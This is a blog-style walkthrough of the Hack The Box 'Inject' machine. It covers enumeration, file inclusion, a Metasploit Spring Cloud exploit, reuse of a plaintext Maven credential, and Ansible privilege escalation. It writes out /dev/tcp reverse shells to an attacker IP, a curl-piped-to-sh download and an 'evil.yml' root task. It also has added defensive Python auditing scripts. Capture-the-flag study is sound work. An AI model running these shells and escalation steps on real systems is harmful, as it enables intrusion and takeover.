Just tackled the ‘Inject’ machine on #HackTheBox. Loved the exploration of high ports and the challenge of the injection exploitation! If you’re into #CTF, this is a must try! #CyberSecurity #PenTesting #EthicalHacking #InfoSec
The first step is to run our Nmap scan:
$ sudo nmap -sT -n -Pn -sV -T4 -vv 10.10.11.204
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp open nagios-nsca syn-ack Nagios NSCA
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see some interesting information: port 8080 is open, reported as the service “Nagios NSCA”. At this point we can look for more information about this service. Let’s open the application in our browser:
We can see that it is a kind of file-storage application. However, there is more to see in this application:
In the blog section, we can see two possible users, “admin” and “Brandon Auger”. Let’s look at other parts of the application:
We have found an “Upload files” function, which might be a way to get a reverse shell. We can also find another function on this site, the “Sign Up” button:
We can try to enumerate more directories with “ffuf”:
sudo ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.10.11.204:8080/FUZZ -v
[Status: 200, Size: 5371, Words: 1861, Lines: 113, Duration: 90ms]
| URL | http://10.10.11.204:8080/blogs
* FUZZ: blogs
[Status: 500, Size: 106, Words: 3, Lines: 1, Duration: 432ms]
| URL | http://10.10.11.204:8080/error
* FUZZ: error
[Status: 500, Size: 712, Words: 27, Lines: 1, Duration: 481ms]
| URL | http://10.10.11.204:8080/environment
* FUZZ: environment
[Status: 200, Size: 5654, Words: 1053, Lines: 104, Duration: 193ms]
| URL | http://10.10.11.204:8080/register
* FUZZ: register
[Status: 200, Size: 1857, Words: 513, Lines: 54, Duration: 33ms]
| URL | http://10.10.11.204:8080/upload
* FUZZ: upload
Apparently, we don’t find any more directories. We will try to upload a file through the functionality we discovered and capture the request with Burp Suite:
Let’s try to upload a “jpeg” file. We will see our request in Burp Suite:
Before uploading the “jpeg” file I tried some files, but they didn’t work. After forwarding our request we will see the response and finally discover something interesting:
We have found the function that the application uses to show us our uploaded files:
Now, we will try to upload a reverse shell and modify our request in Burp Suite to bypass the restrictions. First, we need to start our listener with netcat:
sudo nc -nlvp 4444
Now, we will create a new file with this content:
sh -i >& /dev/tcp/10.10.16.38/4444 0>&1
Now, we will try to upload this file, but we will need to modify our request with Burp Suite (the file extension):
But apparently it is not working:
If we analyze the URL, we can see that we can probably exploit it with file inclusion:
We can see the application is vulnerable to file inclusion. Let’s see if we can read the “/etc/passwd” file:
We have discovered the users “frank” and “phil”. We need to enumerate more; let’s see what we can find. If we keep searching through the different directories we will see the file “pom.xml”:
This file gives us a lot of information, but there is something interesting: the technology the application is using, “org.springframework.cloud”. With this information we can search whether an exploit exists for this technology:
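To make the file-inclusion class of bug concrete from the defender's side, here is an added Python illustration (not code from the original post or from the Spring application on the box): the naive lookup that joins a user-controlled name onto the upload directory, next to a hardened version that resolves the final path and refuses anything outside the upload root. The upload directory, the sample upload and the "secret" file are constructed for the demo.

```python
# Added example, not from the original post: vulnerable vs hardened file lookup.
# Demonstrates why a request like ../../etc/passwd escapes an upload directory
# and how a resolve-and-check guard stops it. All paths below are constructed.
import os
import tempfile
from pathlib import Path


def serve_file_vulnerable(upload_root: str, requested: str) -> bytes:
    """Naive lookup: the user-supplied name is joined straight onto the root.
    '../secret.txt' walks out of the directory, which is the flaw class."""
    path = os.path.join(upload_root, requested)
    with open(path, "rb") as fh:
        return fh.read()


def serve_file_hardened(upload_root: str, requested: str) -> bytes:
    """Resolve symlinks and '..' first, then require the result to stay under root."""
    root = Path(upload_root).resolve()
    target = (root / requested).resolve()
    # commonpath is the portable way to check containment (Path.is_relative_to is 3.9+)
    if os.path.commonpath([root, target]) != str(root):
        raise PermissionError(f"refusing to serve {requested!r}: outside upload root")
    if not target.is_file():
        raise FileNotFoundError(requested)
    return target.read_bytes()


def demo() -> dict:
    """Build a throwaway tree (uploads/ plus a secret next to it), show the
    traversal leaking through the naive version and being blocked by the hardened one."""
    with tempfile.TemporaryDirectory() as base:
        uploads = Path(base) / "uploads"
        uploads.mkdir()
        (uploads / "photo.jpg").write_bytes(b"JFIF-sample")          # constructed upload
        (Path(base) / "secret.txt").write_bytes(b"constructed secret")  # outside the root
        results = {"legit": serve_file_hardened(str(uploads), "photo.jpg")}
        results["naive_leak"] = serve_file_vulnerable(str(uploads), "../secret.txt")
        try:
            serve_file_hardened(str(uploads), "../secret.txt")
            results["hardened_blocked"] = False
        except PermissionError:
            results["hardened_blocked"] = True
        return results


if __name__ == "__main__":
    print(demo())
```

The guard resolves before comparing, so symlinked or `..`-laden names are judged by where they actually land, not by how they are spelled; an allow-list of extensions on top of this is a reasonable second layer but is not a substitute for the containment check.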
$ searchsploit spring cloud
--------------------------------------------------------- ---------------------
 Exploit Title                                           | Path
--------------------------------------------------------- ---------------------
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)  | java/webapps/46772.rb
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)  | java/webapps/46772.rb
Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE) | java/webapps/50799.py
--------------------------------------------------------- ---------------------
However, if we search in Metasploit for the component we have already found, we will see this exploit:
After configuring this exploit, we can exploit the vulnerability:
We will check some information in our Meterpreter session:
meterpreter > sysinfo
Computer : 10.10.11.204
OS : Ubuntu 20.04 (Linux 5.4.0-144-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: frank
Now we have access to this machine as the user “frank”. Let’s see if we can spawn a shell to search for more information on this machine:
meterpreter > shell
Process 8848 created.
Channel 1 created.
Now we have a shell. At this point we need to enumerate more to try to gain access to the next user, because right now we cannot reach it. We will find the following file with the “phil” credentials:
pwd
/home/frank/.m2
ls -la
total 12
drwx------ 2 frank frank 4096 Feb 1 18:38 .
drwxr-xr-x 5 frank frank 4096 Feb 1 18:38 ..
-rw-r----- 1 root frank 617 Jan 31 16:55 settings.xml
cat settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>
Now, with this new information, we can check whether we can switch to the user “phil”:
su phil
Password: DocPhillovestoInject123
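The credential reuse above is the classic Maven settings.xml exposure: a plaintext <password> in a <server> block, readable by a non-root user. The following Python audit script is an added example (not from the original post, and not Maven's own tooling); it parses a settings.xml, flags plaintext passwords (Maven's own encrypted form is the {base64} syntax, which is accepted), and flags file modes and <filePermissions>/<directoryPermissions> values that grant group or other access. The sample settings.xml is constructed and its password is a placeholder, not the one from the box.

```python
# Added example, not from the original post: audit Maven settings.xml for plaintext
# server credentials and over-permissive modes. The sample file below is constructed.
import os
import re
import stat
import tempfile
import xml.etree.ElementTree as ET

MAVEN_NS = "{http://maven.apache.org/POM/4.0.0}"
# Maven's encrypted password format is {base64...}; anything else is plaintext
ENCRYPTED_RE = re.compile(r"^\{[A-Za-z0-9+/=]+\}$")

SAMPLE_SETTINGS = """<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>PLACEHOLDER-NOT-THE-REAL-PASSWORD</password>
      <filePermissions>660</filePermissions>
    </server>
    <server>
      <id>encrypted-ok</id>
      <username>ci</username>
      <password>{COQLCE6DU6GtcS5P=}</password>
    </server>
  </servers>
</settings>
"""


def audit_settings_xml(path: str) -> list:
    """Return a list of finding strings for one settings.xml file."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(f"{path}: readable by group/other (mode {oct(mode)})")
    root = ET.parse(path).getroot()
    # files written without the xmlns declaration have un-namespaced tags
    ns = MAVEN_NS if root.tag.startswith("{") else ""
    for server in root.iter(f"{ns}server"):
        sid = server.findtext(f"{ns}id", default="?")
        pw = server.findtext(f"{ns}password")
        if pw and not ENCRYPTED_RE.match(pw.strip()):
            findings.append(f"{path}: server '{sid}' stores a plaintext password")
        for tag in ("filePermissions", "directoryPermissions"):
            perm = server.findtext(f"{ns}{tag}")
            # any bit in the group/other positions means non-owners get access
            if perm and int(perm, 8) & 0o077:
                findings.append(f"{path}: server '{sid}' {tag}={perm} grants group/other access")
    return findings


def demo() -> list:
    """Write the constructed sample with the same 640 mode seen on the box and audit it."""
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, "settings.xml")
        with open(p, "w") as fh:
            fh.write(SAMPLE_SETTINGS)
        os.chmod(p, 0o640)
        return audit_settings_xml(p)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Pointing it at ~/.m2/settings.xml for every home directory on a host (or running it from a configuration-management check) surfaces exactly the lateral-movement path used here; the fix is mvn --encrypt-password plus a 600 mode on the file.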
We will check our user:
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
Go to the user’s home directory:
cd /home/phil/
Check the directory:
ls -la
total 24
drwxr-xr-x 3 phil phil 4096 Feb 1 18:38 .
drwxr-xr-x 4 root root 4096 Feb 1 18:38 ..
lrwxrwxrwx 1 root root 9 Feb 1 07:40 .bash_history -> /dev/null
-rw-r--r-- 1 phil phil 3771 Feb 25 2020 .bashrc
drwx------ 2 phil phil 4096 Feb 1 18:38 .cache
-rw-r--r-- 1 phil phil 807 Feb 25 2020 .profile
-rw-r----- 1 root phil 33 Jun 7 04:47 user.txt
Finally, we can check the user flag:
cat user.txt
Now, at this point, we will upgrade our shell with Python:
python3 -c 'import pty; pty.spawn("/bin/bash")'
We need to enumerate more to try to gain root access. We will start our web server to download linpeas onto the machine:
sudo python3 -m http.server 80
After that, we will run linpeas on the machine:
curl http://10.10.16.38/linpeas.sh | sh
In linpeas’ check of binary process permissions (binaries that are not owned by “root root” and do not belong to the current user) we have discovered “/tmp/Vodoy”:
Let’s gather more information about that with the tool “pspy64”:
phil@inject:~$ wget http://10.10.16.38/pspy64
phil@inject:~$ chmod +x pspy64
phil@inject:~$ ./pspy64
We will find a lot of Ansible processes and automation tasks. Let’s see if we can do privilege escalation (PE) through Ansible:
Let’s try to do PE with an Ansible task (https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/). We need to go to the directory “/opt/automation/tasks/” because we will create a new task there. Now, we need to prepare our evil task. Create a new file with this content:
- hosts: localhost
  tasks:
    - name: RShell
      command: sudo bash /tmp/root.sh
Now, we can download it from our machine:
phil@inject:/opt/automation/tasks$ wget http://10.10.16.38:8080/evil.yml
The next step is to create the file “/tmp/root.sh” with the reverse shell:
echo '/bin/bash -i >& /dev/tcp/10.10.16.38/4422 0>&1' > /tmp/root.sh
Also, don’t forget to start our netcat listener:
$ sudo nc -nlvp 4422
Now, we can exploit the vulnerability to gain root access on the machine:
phil@inject:/opt/automation/tasks$ ansible-playbook evil.yml
Now, we receive the reverse shell with root permissions:
Now we can reach the root flag:
root@inject:/opt/automation/tasks# cd /root/
cd /root/
root@inject:~# ls
playbook_1.yml
root.txt
root@inject:~# cat root.txt
cat root.txt
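The root path here rests on two weak settings: a task directory that a low-privileged user can write to, and a root-owned automation job that runs every playbook it finds there. As an added example (not from the original post, and not part of Ansible), the Python script below audits such a directory the way a defender would: it flags a directory or task file that is group/other writable, and lists tasks that hand a command to the shell via the command, shell, raw or script modules so they get reviewed. The directory tree and the two playbooks are constructed for the demo; the playbook_1.yml name mirrors the one seen in root’s home, nothing else is taken from the machine.

```python
# Added example, not from the original post: audit an automation drop directory
# (like /opt/automation/tasks on the box) for the conditions that enabled the PE.
# The directory and playbooks below are constructed for the demo.
import os
import re
import stat
import tempfile

SHELL_MODULES = ("command", "shell", "raw", "script")
# matches a task line such as "      shell: ..." or "      ansible.builtin.command: ..."
MODULE_RE = re.compile(
    r"^\s*-?\s*(?:ansible\.builtin\.)?(" + "|".join(SHELL_MODULES) + r")\s*:", re.M
)

SAFE_PLAYBOOK = """- hosts: localhost
  tasks:
    - name: keep webroot in sync
      copy:
        src: /srv/site/
        dest: /var/www/html/
"""

RISKY_PLAYBOOK = """- hosts: localhost
  tasks:
    - name: nightly cleanup
      shell: find /tmp -mtime +7 -delete
"""


def writable_by_others(path: str) -> bool:
    """True if the group or other write bit is set on path."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_task_dir(task_dir: str) -> list:
    """Return finding strings for a directory whose playbooks a privileged job runs."""
    findings = []
    if writable_by_others(task_dir):
        findings.append(f"{task_dir}: directory is group/other writable; anyone can drop a playbook")
    for name in sorted(os.listdir(task_dir)):
        if not name.endswith((".yml", ".yaml")):
            continue
        path = os.path.join(task_dir, name)
        if writable_by_others(path):
            findings.append(f"{path}: task file is group/other writable")
        with open(path) as fh:
            text = fh.read()
        for m in MODULE_RE.finditer(text):
            findings.append(f"{path}: uses '{m.group(1)}' module; review the command it runs")
    return findings


def demo() -> list:
    """Build a constructed tasks directory with the weak 777 mode and audit it."""
    with tempfile.TemporaryDirectory() as base:
        tasks = os.path.join(base, "tasks")
        os.mkdir(tasks)
        for fname, body, mode in (("playbook_1.yml", SAFE_PLAYBOOK, 0o644),
                                  ("cleanup.yml", RISKY_PLAYBOOK, 0o666)):
            p = os.path.join(tasks, fname)
            with open(p, "w") as fh:
                fh.write(body)
            os.chmod(p, mode)
        os.chmod(tasks, 0o777)  # the weak setting: any local user can add a task
        return audit_task_dir(tasks)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The mitigation it points at is straightforward: the task directory and every file in it should be root-owned with mode 755/644 (or stricter), and the job that runs them should only pick up an explicit, fixed list of playbooks rather than a glob over the directory.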
That’s it for our deep-dive into ‘Inject,’ a true masterclass in understanding and exploiting vulnerabilities in the world of Hack The Box CTF challenges. As we unpacked the twists and turns of enumeration and injection, we’ve gained vital knowledge and new skills, elevating our cybersecurity expertise. Until the next challenge, keep on hacking, keep on learning, and always explore responsibly. Stay tuned for more journeys into the thrilling world of CTF challenges!
Keep your hacking spirit high and cybersecurity curiosity alive!